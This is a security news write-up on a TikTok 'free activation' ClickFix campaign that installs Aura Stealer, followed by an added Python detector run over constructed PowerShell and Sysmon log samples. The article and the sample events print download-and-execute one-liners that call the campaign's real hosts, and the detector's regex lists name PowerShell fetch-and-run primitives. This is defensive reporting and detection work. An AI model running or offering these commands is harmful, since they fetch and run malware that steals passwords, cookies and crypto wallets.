Particle.news

Researchers Warn of Active TikTok ClickFix Campaign Installing Aura Stealer

Security analysts say viral tutorials instruct viewers to run a PowerShell one-liner that fetches a script from slmgr[.]win, which in turn pulls the malware from a Cloudflare Pages host.

Overview

  • BleepingComputer and ISC handler Xavier Mertens documented TikTok videos posing as free activations for Windows, Photoshop, Microsoft 365, CapCut Pro, and Discord Nitro, as well as fabricated “free” unlocks for services like “Spotify Premium” or “Netflix Premium.”
  • Viewers are told to open PowerShell as administrator and run a single command, for example iex (irm slmgr[.]win/photoshop). Here irm (Invoke-RestMethod) downloads a follow‑on PowerShell script from the slmgr[.]win domain and iex (Invoke-Expression) runs it directly from memory, so the script itself never touches disk.
  • That script downloads updater.exe from file-epq[.]pages.dev, a Cloudflare Pages host. The binary has been identified as an Aura Stealer variant that exfiltrates saved passwords, cookies, cryptocurrency wallets, and other application credentials.
  • A second file, source.exe, is fetched as well; it compiles embedded .NET source code with the C# compiler csc.exe and executes the result in memory. Its precise role has not yet been determined.
  • ZDNET found numerous live scam videos still on the platform, and Microsoft reports that ClickFix accounted for 47% of the initial access it has observed since 2024. Researchers urge anyone who ran such a command to reset passwords immediately, enable MFA, and never paste commands copied from social media into a terminal.
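The one-liner and the csc.exe stage described above leave a recognisable footprint in host telemetry. The following detector is an added example written for this page, not code from BleepingComputer, ISC or any vendor. It applies three rules to constructed sample records modelled on PowerShell script-block logging (Event ID 4104) and Sysmon process creation (Event ID 1): a download primitive and an execute primitive in the same script block, a match on the two hosts the write-up names, and a heuristic for csc.exe launched by something other than normal build tooling against a response file in a temp directory. The regexes, the build-tool allowlist, the csc.exe heuristic and the host installer.example are my assumptions; the sample events are not real logs.

```python
import ntpath
import re

# Hosts named in the public write-up (defanged there, normalised here to match raw log text).
IOC_HOSTS = ("slmgr.win", "file-epq.pages.dev")

# PowerShell download primitives and their common aliases (assumed list, not exhaustive).
DOWNLOAD_RE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|"
    r"downloaddata|net\.webclient|start-bitstransfer)\b",
    re.IGNORECASE,
)
# Primitives that turn fetched text into running code (assumed list).
EXECUTE_RE = re.compile(
    r"(\biex\b|\binvoke-expression\b|\.invoke\(|&\s*\(|\[scriptblock\]::create)",
    re.IGNORECASE,
)
# Parents that legitimately spawn the C# compiler on a developer machine (assumed allowlist).
BUILD_TOOL_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}
TEMP_PATH_RE = re.compile(r"\\appdata\\local\\temp\\|\\windows\\temp\\", re.IGNORECASE)


def scan_script_block(text: str) -> list[str]:
    """Rules for one script-block (Event ID 4104) or console-history line."""
    findings = []
    if DOWNLOAD_RE.search(text) and EXECUTE_RE.search(text):
        findings.append("download-and-execute one-liner (ClickFix pattern)")
    hits = [h for h in IOC_HOSTS if h in text.lower()]
    if hits:
        findings.append("known campaign host: " + ", ".join(hits))
    return findings


def scan_process(parent_image: str, image: str, cmdline: str) -> list[str]:
    """Heuristic for the csc.exe stage: compiler started outside build tooling and fed
    a response file from a temp directory. Added heuristic, not a published indicator."""
    findings = []
    if ntpath.basename(image).lower() == "csc.exe":
        parent = ntpath.basename(parent_image).lower()
        if parent not in BUILD_TOOL_PARENTS and TEMP_PATH_RE.search(cmdline):
            findings.append(f"csc.exe spawned by {parent} compiling from a temp directory")
    return findings


def scan_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run every event through the rule set; return (index, findings) for hits only."""
    results = []
    for i, ev in enumerate(events):
        if ev["id"] == 4104:
            f = scan_script_block(ev["text"])
        elif ev["id"] == 1:
            f = scan_process(ev["parent"], ev["image"], ev["cmdline"])
        else:
            f = []
        if f:
            results.append((i, f))
    return results


# Constructed sample events (not real telemetry): 4104 script-block text and Sysmon
# Event ID 1 process-creation fields.
SAMPLE_EVENTS = [
    {"id": 4104, "text": "iex (irm slmgr.win/photoshop)"},
    {"id": 4104, "text": "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"},
    # Same pattern with the full cmdlet names and a hypothetical host.
    {"id": 4104, "text": "Invoke-Expression (Invoke-RestMethod 'https://installer.example/setup')"},
    {"id": 4104, "text": "(New-Object Net.WebClient).DownloadFile('https://file-epq.pages.dev/updater.exe', \"$env:TEMP\\updater.exe\")"},
    {"id": 1, "parent": "C:\\Users\\u\\Downloads\\source.exe",
     "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
     "cmdline": 'csc.exe /noconfig /fullpaths @"C:\\Users\\u\\AppData\\Local\\Temp\\x1.cmdline"'},
    {"id": 1, "parent": "C:\\Program Files\\Microsoft Visual Studio\\MSBuild.exe",
     "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
     "cmdline": 'csc.exe /noconfig @"C:\\src\\app\\obj\\Debug\\app.cmdline"'},
]

if __name__ == "__main__":
    for idx, findings in scan_events(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(idx, ev.get("text") or ev["cmdline"])
        for f in findings:
            print("   ->", f)
```

Two practical caveats: Event ID 4104 records exist only where PowerShell script block logging is enabled, so on an unmanaged home machine the PSReadLine history file (%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt) is often the only record of the pasted one-liner and can be fed to scan_script_block line by line. And because the stealer runs before any alert fires, a hit on these rules should be treated as confirmed credential exposure, not as a blocked attempt.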